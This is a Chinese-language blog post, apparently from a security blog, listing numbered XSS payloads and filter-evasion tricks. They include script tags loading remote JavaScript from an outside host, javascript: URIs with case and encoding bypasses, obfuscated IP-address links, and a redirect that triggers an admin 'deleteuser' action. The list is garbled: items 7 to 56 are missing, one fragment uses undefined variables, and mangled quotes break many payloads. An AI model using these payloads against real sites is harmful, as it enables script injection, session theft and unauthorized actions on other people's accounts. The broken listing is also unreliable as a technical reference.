77种XSS跨站脚本攻击
1)普通的XSS JavaScript注入
<script type="text/javascript" src="http://webshell.cc/XSS/xss.js"></script>(2)IMG标签XSS使用JavaScript命令
<script type="text/javascript" src="http://webshell.cc/XSS/xss.js"></script>(3)IMG标签无分号无引号
<img src="javascript:alert(‘XSS’)" alt="" />(4)IMG标签大小写不敏感
<img src="JaVaScRiPt:alert(‘XSS’)" alt="" />(5)HTML编码(必须有分号)
<img src="javascript:alert(“XSS”)" alt="" />(6)修正缺陷IMG标签
<img title="" src="”http://webshell.cc/XSS/xss.swf”" alt="" /> c=”javascript:”;
d=”alert(‘XSS’);\”)”;
eval_r(a+b+c+d);(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
XSS(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
<script type="text/javascript" src="””"></script>(59)IMG嵌入式命令,可执行任意命令
<img src="”http://www.XXX.com/a.php?a=b”" alt="" />(60)IMG嵌入式命令(a.jpg在同服务器)
Redirect 302 /a.jpg https://www.webshell.cc/admin.asp&deleteuser
(61)绕符号过滤
<script type="text/javascript">// <![CDATA[
” SRC=”http://webshell.cc/xss.js”>
// ]]></script>(62)
<script type="text/javascript">// <![CDATA[
” SRC=”http://webshell.cc/xss.js”>
// ]]></script>(63)
<script type="text/javascript">// <![CDATA[
” ” SRC=”http://webshell.cc/xss.js”>
// ]]></script>(64)
<script type="text/javascript">// <![CDATA[
’” SRC=”http://webshell.cc/xss.js”>
// ]]></script>(65)
<script type="text/javascript">// <![CDATA[
` SRC=”http://webshell.cc/xss.js”>
// ]]></script>(66)
<script type="text/javascript">// <![CDATA[
’>” SRC=”http://webshell.cc/xss.js”>
// ]]></script>(67)
<script type="text/javascript">// <![CDATA[
document.write(“<SCRI”);
// ]]></script>PT SRC=”http://webshell.cc/xss.js”>(68)URL绕行
<a href="”http://127.0.0.1/”">XSS</a>(69)URL编码
<a href="”http://webshell.cc”">XSS</a>(70)IP十进制
<a href="”http://3232235521″">XSS</a>(71)IP十六进制
<a href="”http://0xc0.0xa8.0×00.0×01″">XSS</a>(72)IP八进制
<a href="”http://0300.0250.0000.0001″">XSS</a>(73)混合编码
tt p://6 6.000146.0×7.147/”">XSS(74)节省[http:]
<a href="”//www.webshell.cc/”">XSS</a>(75)节省[www]
<a href="”http://webshell.cc/”">XSS</a>(76)绝对点绝对DNS
<a href="”https://www.webshell.cc./”">XSS</a>(77)javascript链接
<a href="”javascript:document.location=’https://www.webshell.cc/’”">XSS</a>
转载请注明来自WebShell'S Blog,本文地址:https://www.webshell.cc/377.html